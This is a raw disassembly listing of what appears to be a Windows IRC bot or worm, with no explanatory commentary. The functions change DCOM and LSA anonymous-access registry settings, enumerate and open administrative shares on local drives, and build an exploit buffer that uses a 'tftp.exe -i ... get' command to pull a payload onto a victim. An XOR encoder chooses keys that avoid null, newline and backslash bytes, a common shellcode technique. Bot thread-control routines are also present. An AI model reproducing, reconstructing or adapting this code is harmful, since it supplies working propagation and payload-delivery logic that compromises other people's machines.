push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_441428 ; RegOpenKeyExA
test eax, eax
jnz short loc_4165EC
mov ax, word_43B23C
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4413DC ; RegSetValueExA
test eax, eax
jz short loc_4165CE
push offset unk_43B1FC
jmp short loc_4165D3
; ---------------------------------------------------------------------------
loc_4165CE: ; CODE XREF: sub_416561+64�j
push offset dword_43B1D0
loc_4165D3: ; CODE XREF: sub_416561+6B�j
lea eax, [ebp+var_214]
push eax
call sub_4173AC
pop ecx
pop ecx
push [ebp+var_4]
call dword_441394 ; RegCloseKey
jmp short loc_4165FF
; ---------------------------------------------------------------------------
loc_4165EC: ; CODE XREF: sub_416561+36�j
lea eax, [ebp+var_214]
push offset unk_43B190
push eax
call sub_4173AC
pop ecx
pop ecx
loc_4165FF: ; CODE XREF: sub_416561+89�j
cmp [ebp+arg_C], edi
jnz short loc_41661E
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_41661E: ; CODE XREF: sub_416561+A1�j
lea eax, [ebp+var_214]
push eax
call sub_40C4F7
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurren_0 ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_441428 ; RegOpenKeyExA
test eax, eax
jnz short loc_41668C
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call dword_4413DC ; RegSetValueExA
test eax, eax
jz short loc_41666E
push offset unk_43B130
jmp short loc_416673
; ---------------------------------------------------------------------------
loc_41666E: ; CODE XREF: sub_416561+104�j
push offset unk_43B0EC
loc_416673: ; CODE XREF: sub_416561+10B�j
lea eax, [ebp+var_214]
push eax
call sub_4173AC
pop ecx
pop ecx
push [ebp+var_4]
call dword_441394 ; RegCloseKey
jmp short loc_4166A6
; ---------------------------------------------------------------------------
loc_41668C: ; CODE XREF: sub_416561+E2�j
push offset unk_43B0A0
jmp short loc_416698
; ---------------------------------------------------------------------------
loc_416693: ; CODE XREF: sub_416561+13�j
push offset unk_43B060
loc_416698: ; CODE XREF: sub_416561+130�j
lea eax, [ebp+var_214]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_4166A6: ; CODE XREF: sub_416561+129�j
cmp [ebp+arg_C], edi
jnz short loc_4166C5
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_4166C5: ; CODE XREF: sub_416561+148�j
lea eax, [ebp+var_214]
push eax
call sub_40C4F7
cmp dword_4414B0, edi
pop ecx
jnz loc_416840
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_4166E8: ; CODE XREF: sub_416561+2C3�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call dword_441304
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_416785
cmp eax, 0EAh
jz short loc_416785
mov esi, offset off_43AEC8
loc_416719: ; CODE XREF: sub_416561+21D�j
push dword ptr [esi]
push edi
call sub_40E261
pop ecx
pop ecx
push dword ptr [esi]
test eax, eax
jnz short loc_416730
push offset unk_43B02C
jmp short loc_416735
; ---------------------------------------------------------------------------
loc_416730: ; CODE XREF: sub_416561+1C6�j
push offset unk_43AFF0
loc_416735: ; CODE XREF: sub_416561+1CD�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_41792A
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_416768
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_416768: ; CODE XREF: sub_416561+1EB�j
lea eax, [ebp+var_214]
push eax
call sub_40C4F7
add esi, 8
pop ecx
cmp esi, offset off_43AEE8
jl short loc_416719
jmp loc_41681D
; ---------------------------------------------------------------------------
loc_416785: ; CODE XREF: sub_416561+1AA�j
; sub_416561+1B1�j
mov esi, [ebp+var_8]
push 1
pop ebx
cmp [ebp+var_4], ebx
jb loc_416814
loc_416794: ; CODE XREF: sub_416561+2AF�j
mov edi, [esi]
push edi
call sub_417C91
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_416809
push edi
call sub_40E14E
push eax
push 0
call sub_40E261
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_4167C3
push offset unk_43AFBC
jmp short loc_4167C8
; ---------------------------------------------------------------------------
loc_4167C3: ; CODE XREF: sub_416561+259�j
push offset unk_43AF80
loc_4167C8: ; CODE XREF: sub_416561+260�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_41792A
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_4167FC
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_4167FC: ; CODE XREF: sub_416561+27F�j
lea eax, [ebp+var_214]
push eax
call sub_40C4F7
pop ecx
loc_416809: ; CODE XREF: sub_416561+242�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_416794
xor edi, edi
loc_416814: ; CODE XREF: sub_416561+22D�j
push [ebp+var_8]
call dword_441448
loc_41681D: ; CODE XREF: sub_416561+21F�j
cmp [ebp+var_10], 0EAh
jz loc_4166E8
lea eax, [ebp+var_214]
push offset unk_43AF48
push eax
call sub_4173AC
pop ecx
pop ecx
pop ebx
jmp short loc_416853
; ---------------------------------------------------------------------------
loc_416840: ; CODE XREF: sub_416561+177�j
lea eax, [ebp+var_214]
push offset unk_43AF08
push eax
call sub_4173AC
pop ecx
pop ecx
loc_416853: ; CODE XREF: sub_416561+2DD�j
cmp [ebp+arg_C], edi
jnz short loc_416871
push edi
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_416871: ; CODE XREF: sub_416561+2F5�j
lea eax, [ebp+var_214]
push eax
call sub_40C4F7
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_416561 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416885 proc near ; CODE XREF: sub_416501:loc_416548�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword_441488, ebx
push esi
jnz loc_4169B3
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_441428 ; RegOpenKeyExA
test eax, eax
jnz short loc_416910
mov ax, word_43B424
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4413DC ; RegSetValueExA
test eax, eax
jz short loc_4168F2
push offset unk_43B3F0
jmp short loc_4168F7
; ---------------------------------------------------------------------------
loc_4168F2: ; CODE XREF: sub_416885+64�j
push offset dword_43B3C4
loc_4168F7: ; CODE XREF: sub_416885+6B�j
lea eax, [ebp+var_220]
push eax
call sub_4173AC
pop ecx
pop ecx
push [ebp+var_4]
call dword_441394 ; RegCloseKey
jmp short loc_416923
; ---------------------------------------------------------------------------
loc_416910: ; CODE XREF: sub_416885+36�j
lea eax, [ebp+var_220]
push offset unk_43B190
push eax
call sub_4173AC
pop ecx
pop ecx
loc_416923: ; CODE XREF: sub_416885+89�j
cmp [ebp+arg_C], ebx
jnz short loc_416942
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_416942: ; CODE XREF: sub_416885+A1�j
lea eax, [ebp+var_220]
push eax
call sub_40C4F7
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurren_0 ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_441428 ; RegOpenKeyExA
test eax, eax
jnz short loc_4169AC
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call dword_4413DC ; RegSetValueExA
test eax, eax
jz short loc_41698E
push offset unk_43B378
jmp short loc_416993
; ---------------------------------------------------------------------------
loc_41698E: ; CODE XREF: sub_416885+100�j
push offset unk_43B334
loc_416993: ; CODE XREF: sub_416885+107�j
lea eax, [ebp+var_220]
push eax
call sub_4173AC
pop ecx
pop ecx
push [ebp+var_4]
call dword_441394 ; RegCloseKey
jmp short loc_4169C6
; ---------------------------------------------------------------------------
loc_4169AC: ; CODE XREF: sub_416885+E2�j
push offset unk_43B2E8
jmp short loc_4169B8
; ---------------------------------------------------------------------------
loc_4169B3: ; CODE XREF: sub_416885+13�j
push offset unk_43B060
loc_4169B8: ; CODE XREF: sub_416885+12C�j
lea eax, [ebp+var_220]
push eax
call sub_4173AC
pop ecx
pop ecx
loc_4169C6: ; CODE XREF: sub_416885+125�j
cmp [ebp+arg_C], ebx
jnz short loc_4169E5
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_4169E5: ; CODE XREF: sub_416885+144�j
lea eax, [ebp+var_220]
push eax
call sub_40C4F7
cmp dword_4414B0, ebx
pop ecx
jnz loc_416B57
push edi
mov esi, offset off_43AEC8
mov edi, 200h
loc_416A09: ; CODE XREF: sub_416885+1E9�j
push dword ptr [esi+4]
push dword ptr [esi]
push ebx
call sub_40E1B5
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_416A24
push offset unk_43B2B8
jmp short loc_416A29
; ---------------------------------------------------------------------------
loc_416A24: ; CODE XREF: sub_416885+196�j
push offset unk_43B280
loc_416A29: ; CODE XREF: sub_416885+19D�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_41792A
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_416A58
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_416A58: ; CODE XREF: sub_416885+1B7�j
lea eax, [ebp+var_220]
push eax
call sub_40C4F7
add esi, 8
pop ecx
cmp esi, offset off_43AED8
jl short loc_416A09
nop
call near ptr 7C830B14h
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_416B3F
loc_416A83: ; CODE XREF: sub_416885+2B4�j
mov eax, [ebp+var_4]
and eax, 1
cmp al, 1
jnz loc_416B34
cmp bl, 41h
jz loc_416B34
movsx esi, bl
push esi
push offset aC_2 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_41792A
push esi
push offset aC_1 ; "%c:\\"
lea eax, [ebp+var_20]
push 0Ah
push eax
call sub_41792A
add esp, 20h
lea eax, [ebp+var_20]
push eax
call dword_441418 ; GetDriveTypeA
cmp eax, 3
jnz short loc_416B34
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_40E1B5
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
jnz short loc_416AF2
push offset unk_43B2B8
jmp short loc_416AF7
; ---------------------------------------------------------------------------
loc_416AF2: ; CODE XREF: sub_416885+264�j
push offset unk_43B280
loc_416AF7: ; CODE XREF: sub_416885+26B�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_41792A
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_416B27
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_416B27: ; CODE XREF: sub_416885+286�j
lea eax, [ebp+var_220]
push eax
call sub_40C4F7
pop ecx
loc_416B34: ; CODE XREF: sub_416885+206�j
; sub_416885+20F�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_416A83
loc_416B3F: ; CODE XREF: sub_416885+1F8�j
lea eax, [ebp+var_220]
push offset unk_43B240
push eax
call sub_4173AC
pop ecx
xor ebx, ebx
pop ecx
pop edi
jmp short loc_416B6A
; ---------------------------------------------------------------------------
loc_416B57: ; CODE XREF: sub_416885+173�j
lea eax, [ebp+var_220]
push offset unk_43AF08
push eax
call sub_4173AC
pop ecx
pop ecx
loc_416B6A: ; CODE XREF: sub_416885+2D0�j
cmp [ebp+arg_C], ebx
jnz short loc_416B88
push ebx
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_416B88: ; CODE XREF: sub_416885+2E8�j
lea eax, [ebp+var_220]
push eax
call sub_40C4F7
pop ecx
push 1
pop eax
pop esi
pop ebx
leave
retn
sub_416885 endp
; ---------------------------------------------------------------------------
dword_416B9C dd 6A016Ah, 6A006Ah, 0FFF9B8E8h, 10C483FFh, 0AEC035FFh
; DATA XREF: ___:0040F111�o
dd 0E8900043h, 7C3EB88Ah
db 0EBh, 0E2h
; =============== S U B R O U T I N E =======================================
sub_416BBA proc near ; CODE XREF: sub_416BDA+A�p
; sub_416CB2+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_417AF0
push [esp+8+arg_4]
mov esi, eax
call sub_417AF0
pop ecx
lea eax, [esi+eax*2+0C1h]
pop ecx
pop esi
retn
sub_416BBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416BDA proc near ; CODE XREF: sub_416CC9+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_416BBA
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_416BF7
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_416BF7: ; CODE XREF: sub_416BDA+17�j
push ebx
push esi
push edi
push [ebp+arg_8]
call sub_417AF0
push [ebp+arg_C]
mov esi, eax
call sub_417AF0
mov edi, eax
mov ebx, [ebp+arg_0]
push 0FFFFFFEDh
lea eax, [edi+esi+12h]
mov dword_43B4BC, eax
lea eax, [edi+1]
mov dword_43B4DD, eax
lea eax, [edi+17h]
mov dword_43B4D5, eax
pop eax
push 74h
sub eax, edi
push offset dword_43B458
push ebx
mov dword_43B4EB, eax
call sub_417490
push esi
lea eax, [ebx+74h]
push [ebp+arg_8]
push eax
call sub_417490
add esi, 74h
push 5
push (offset aTftp_exeIGet+0Ch)
lea eax, [esi+ebx]
push eax
call sub_417490
add esi, 5
push edi
push [ebp+arg_C]
lea eax, [esi+ebx]
push eax
call sub_417490
add esi, edi
push 10h
push (offset aTftp_exeIGet+11h)
lea eax, [esi+ebx]
push eax
call sub_417490
add esp, 44h
add esi, 10h
push edi
lea eax, [esi+ebx]
push [ebp+arg_C]
push eax
call sub_417490
add esi, edi
push 38h
add esi, ebx
push offset byte_43B4E1
push esi
call sub_417490
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_416BDA endp
; =============== S U B R O U T I N E =======================================
sub_416CB2 proc near ; CODE XREF: sub_416CC9+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_416BBA
push eax
call sub_416D36
add esp, 0Ch
retn
sub_416CB2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416CC9 proc near ; CODE XREF: sub_403BE2+32�p
; sub_404D78+43�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_416CB2
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_416CE9
cmp eax, 0FFFFh
jbe short loc_416CED
loc_416CE9: ; CODE XREF: sub_416CC9+17�j
xor eax, eax
jmp short loc_416D32
; ---------------------------------------------------------------------------
loc_416CED: ; CODE XREF: sub_416CC9+1E�j
push esi
push edi
push ebx
call sub_416BBA
add eax, 101h
push eax
call sub_417BEE
add esp, 0Ch
mov esi, eax
push edi
push ebx
push edi
push ebx
call sub_416BBA
pop ecx
pop ecx
push eax
push esi
call sub_416BDA
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416D51
push esi
mov edi, eax
call sub_417C62
add esp, 24h
mov eax, edi
pop esi
loc_416D32: ; CODE XREF: sub_416CC9+22�j
pop edi
pop ebx
pop ebp
retn
sub_416CC9 endp
; =============== S U B R O U T I N E =======================================
sub_416D36 proc near ; CODE XREF: sub_416CB2+E�p
; sub_416D51+4A�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_416D3F
inc ecx
loc_416D3F: ; CODE XREF: sub_416D36+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_416D36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D51 proc near ; CODE XREF: sub_416CC9+56�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_C], 0Ah
jz short loc_416D6D
cmp byte ptr [ebp+arg_C], 0Dh
jz short loc_416D6D
cmp byte ptr [ebp+arg_C], 5Ch
jz short loc_416D6D
cmp byte ptr [ebp+arg_C], 0
jnz short loc_416D70
loc_416D6D: ; CODE XREF: sub_416D51+8�j
; sub_416D51+E�j ...
inc [ebp+arg_C]
loc_416D70: ; CODE XREF: sub_416D51+1A�j
push esi
mov esi, 0FFh
cmp [ebp+arg_C], esi
jbe short loc_416D98
mov eax, [ebp+arg_C]
shr eax, 8
cmp al, 0Ah
jz short loc_416D91
cmp al, 0Dh
jz short loc_416D91
cmp al, 5Ch
jz short loc_416D91
test al, al
jnz short loc_416D98
loc_416D91: ; CODE XREF: sub_416D51+32�j
; sub_416D51+36�j ...
add [ebp+arg_C], 100h
loc_416D98: ; CODE XREF: sub_416D51+28�j
; sub_416D51+3E�j
push [ebp+arg_C]
call sub_416D36
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_416DB0
cmp eax, 0FFFFh
jbe short loc_416DB7
loc_416DB0: ; CODE XREF: sub_416D51+56�j
xor eax, eax
jmp loc_416E55
; ---------------------------------------------------------------------------
loc_416DB7: ; CODE XREF: sub_416D51+5D�j
mov ecx, [ebp+arg_C]
push ebx
mov bl, byte_515858
xor edx, edx
push edi
mov edi, [ebp+arg_8]
test ecx, ecx
jbe short loc_416DE7
loc_416DCB: ; CODE XREF: sub_416D51+94�j
mov al, [edx+edi]
xor al, bl
jz short loc_416DDE
cmp al, 0Ah
jz short loc_416DDE
cmp al, 0Dh
jz short loc_416DDE
cmp al, 5Ch
jnz short loc_416DE2
loc_416DDE: ; CODE XREF: sub_416D51+7F�j
; sub_416D51+83�j ...
inc bl
xor edx, edx
loc_416DE2: ; CODE XREF: sub_416D51+8B�j
inc edx
cmp edx, ecx
jb short loc_416DCB
loc_416DE7: ; CODE XREF: sub_416D51+78�j
cmp ecx, esi
mov byte_515858, bl
ja short loc_416E13
push 15h
push offset loc_43B440
push [ebp+arg_0]
mov byte_43B44D, cl
mov byte_43B451, bl
call sub_417490
add esp, 0Ch
push 15h
jmp short loc_416E34
; ---------------------------------------------------------------------------
loc_416E13: ; CODE XREF: sub_416D51+9E�j
push 17h
push offset loc_43B428
push [ebp+arg_0]
mov word_43B436, cx
mov byte_43B43B, bl
call sub_417490
add esp, 0Ch
push 17h
loc_416E34: ; CODE XREF: sub_416D51+C0�j
xor eax, eax
pop ecx
cmp [ebp+arg_C], eax
jbe short loc_416E50
mov edx, [ebp+arg_0]
lea esi, [ecx+edx]
loc_416E42: ; CODE XREF: sub_416D51+FD�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_416E42
loc_416E50: ; CODE XREF: sub_416D51+E9�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_416E55: ; CODE XREF: sub_416D51+61�j
pop esi
leave
retn
sub_416D51 endp
; =============== S U B R O U T I N E =======================================
sub_416E58 proc near ; CODE XREF: sub_406047+220�p
; sub_4071BD+F0�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_446C10
loc_416E60: ; CODE XREF: sub_416E58+18�j
cmp byte ptr [eax], 0
jz short loc_416E74
add eax, 234h
inc edi
cmp eax, offset dword_5154C0
jl short loc_416E60
jmp short loc_416EBF
; ---------------------------------------------------------------------------
loc_416E74: ; CODE XREF: sub_416E58+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_446C10[esi]
push eax
call sub_4182F0
mov eax, [esp+14h+arg_4]
add esp, 0Ch
mov dword_446E10[esi], eax
and dword_446E14[esi], 0
mov eax, [esp+8+arg_8]
and dword_446E18[esi], 0
mov dword_446E1C[esi], eax
and byte_446E28[esi], 0
pop esi
loc_416EBF: ; CODE XREF: sub_416E58+1A�j
mov eax, edi
pop edi
retn
sub_416E58 endp
; ---------------------------------------------------------------------------
byte_416EC3 db 55h ; DATA XREF: sub_40F6F1+5D1D�o
dd 0EC81EC8Bh, 98h, 5608458Bh, 59266A57h, 0BD8DF08Bh, 0FFFFFF68h
dd 75FFA5F3h, 9480C7F0h, 1000000h, 8D000000h, 0FFFF6C85h
dd 0F475FFFFh, 68B5FF50h, 0E8FFFFFFh, 15h, 0E8EC75FFh
dd 26Ch, 6A14C483h, 45E89000h, 5F7C3F51h, 0EC8B555Eh, 200EC81h
dd 57560000h, 75FF006Ah, 0B51C6810h, 75FF0043h, 875FF0Ch
dd 0FF6CDBE8h, 14C483FFh, 10BEFF33h, 8000446Ch, 3C74003Eh
dd 147D83h, 0BE830975h, 204h, 562D7500h, 858D57h, 68FFFFFEh
dd 43790Ch, 446E850h, 16A0000h, 0FE00858Dh, 75FFFFFFh
dd 75FF5010h, 875FF0Ch, 0FF6C93E8h, 24C483FFh, 234C681h
dd 81470000h, 5154C0FEh, 5FB07C00h
; ---------------------------------------------------------------------------
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_416F93 proc near ; CODE XREF: sub_40F6F1+5060�p
; sub_417021+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_41701B
cmp esi, 5DCh
jge short loc_41701B
imul esi, 234h
push edi
push ebx
push dword_446E24[esi]
lea edi, dword_446E24[esi]
nop
call near ptr 7C81CE03h
cmp [edi], ebx
jz short loc_416FCB
push 1
pop ebp
loc_416FCB: ; CODE XREF: sub_416F93+33�j
mov [edi], ebx
lea edi, dword_446E18[esi]
mov dword_446E10[esi], ebx
mov dword_446E14[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_416FEC
push eax
call sub_415EA0
pop ecx
loc_416FEC: ; CODE XREF: sub_416F93+50�j
mov [edi], ebx
lea edi, dword_446E1C[esi]
mov byte ptr dword_446C10[esi], bl
mov byte_446E28[esi], bl
push dword ptr [edi]
call dword_441450 ; closesocket
lea esi, dword_446E20[esi]
mov [edi], ebx
push dword ptr [esi]
call dword_441450 ; closesocket
mov [esi], ebx
pop edi
loc_41701B: ; CODE XREF: sub_416F93+D�j
; sub_416F93+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_416F93 endp
; =============== S U B R O U T I N E =======================================
sub_417021 proc near ; CODE XREF: sub_40ABB7:loc_40ABDB�p
; sub_40D93C+18�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_446C10
loc_41702D: ; CODE XREF: sub_417021+2A�j
cmp byte ptr [esi], 0
jz short loc_41703E
push edi
call sub_416F93
test eax, eax
pop ecx
jz short loc_41703E
inc ebx
loc_41703E: ; CODE XREF: sub_417021+F�j
; sub_417021+1A�j
add esi, 234h
inc edi
cmp esi, offset dword_5154C0
jl short loc_41702D
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_417021 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417053 proc near ; CODE XREF: sub_40F6F1+1EB8�p
; sub_40F6F1+202D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_446E14
loc_417067: ; CODE XREF: sub_417053+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_417089
test edi, edi
jle short loc_41707B
cmp [esi], edi
jz short loc_41707B
cmp ebx, edi
jnz short loc_417089
loc_41707B: ; CODE XREF: sub_417053+1E�j
; sub_417053+22�j
push ebx
call sub_416F93
test eax, eax
pop ecx
jz short loc_417089
inc [ebp+var_4]
loc_417089: ; CODE XREF: sub_417053+1A�j
; sub_417053+26�j ...
add esi, 234h
inc ebx
cmp esi, offset dword_5156C4
jl short loc_417067
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_417053 endp
; =============== S U B R O U T I N E =======================================
sub_4170A0 proc near ; CODE XREF: sub_407146+B�p
; sub_4071BD+2D�p ...
arg_0 = dword ptr 4
xor eax, eax
mov ecx, offset dword_446E10
loc_4170A7: ; CODE XREF: sub_4170A0+1C�j
mov edx, [ecx]
cmp edx, [esp+arg_0]
jnz short loc_4170B0
inc eax
loc_4170B0: ; CODE XREF: sub_4170A0+D�j
add ecx, 234h
cmp ecx, offset dword_5156C0
jl short loc_4170A7
retn
sub_4170A0 endp
; =============== S U B R O U T I N E =======================================
sub_4170BF proc near ; CODE XREF: sub_40F6F1+57D8�p
arg_0 = dword ptr 4
xor eax, eax
push esi
xor edx, edx
mov ecx, offset dword_446E10
loc_4170C9: ; CODE XREF: sub_4170BF+1F�j
mov esi, [ecx]
cmp esi, [esp+4+arg_0]
jz short loc_4170E2
add ecx, 234h
inc edx
cmp ecx, offset dword_5156C0
jl short loc_4170C9
pop esi
retn
; ---------------------------------------------------------------------------
loc_4170E2: ; CODE XREF: sub_4170BF+10�j
mov eax, edx
pop esi
retn
sub_4170BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4170E6 proc near ; CODE XREF: sub_40F6F1:loc_41078F�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 200h
xor eax, eax
cmp [ebp+arg_1C], eax
jz short loc_4170FF
push [ebp+arg_1C]
call sub_41791F
pop ecx
loc_4170FF: ; CODE XREF: sub_4170E6+E�j
push eax
push [ebp+arg_18]
call sub_417053
pop ecx
test eax, eax
pop ecx
jle short loc_41712B
push eax
lea eax, [ebp+var_200]
push [ebp+arg_14]
push [ebp+arg_10]
push offset aSSStopped_DThr ; "%s: %s stopped. (%d thread(s) stopped.)"...
push eax
call sub_4173AC
add esp, 14h
jmp short loc_417145
; ---------------------------------------------------------------------------
loc_41712B: ; CODE XREF: sub_4170E6+26�j
push [ebp+arg_14]
lea eax, [ebp+var_200]
push [ebp+arg_10]
push offset aSNoSThreadFoun ; "%s: No %s thread found."
push eax
call sub_4173AC
add esp, 10h
loc_417145: ; CODE XREF: sub_4170E6+43�j
cmp [ebp+arg_C], 0
jnz short loc_417165
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
add esp, 14h
loc_417165: ; CODE XREF: sub_4170E6+63�j
lea eax, [ebp+var_200]
push eax
call sub_40C4F7
pop ecx
leave
retn
sub_4170E6 endp
; =============== S U B R O U T I N E =======================================
sub_417174 proc near ; CODE XREF: sub_401000+A2�p
; sub_401447+8D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
imul eax, 234h
mov dword_446E24[eax], ecx
mov dword_446E10[eax], ecx
mov dword_446E14[eax], ecx
mov dword_446E18[eax], ecx
mov dword_446E1C[eax], ecx
mov dword_446E20[eax], ecx
mov byte ptr dword_446C10[eax], cl
mov byte_446E28[eax], cl
retn
sub_417174 endp
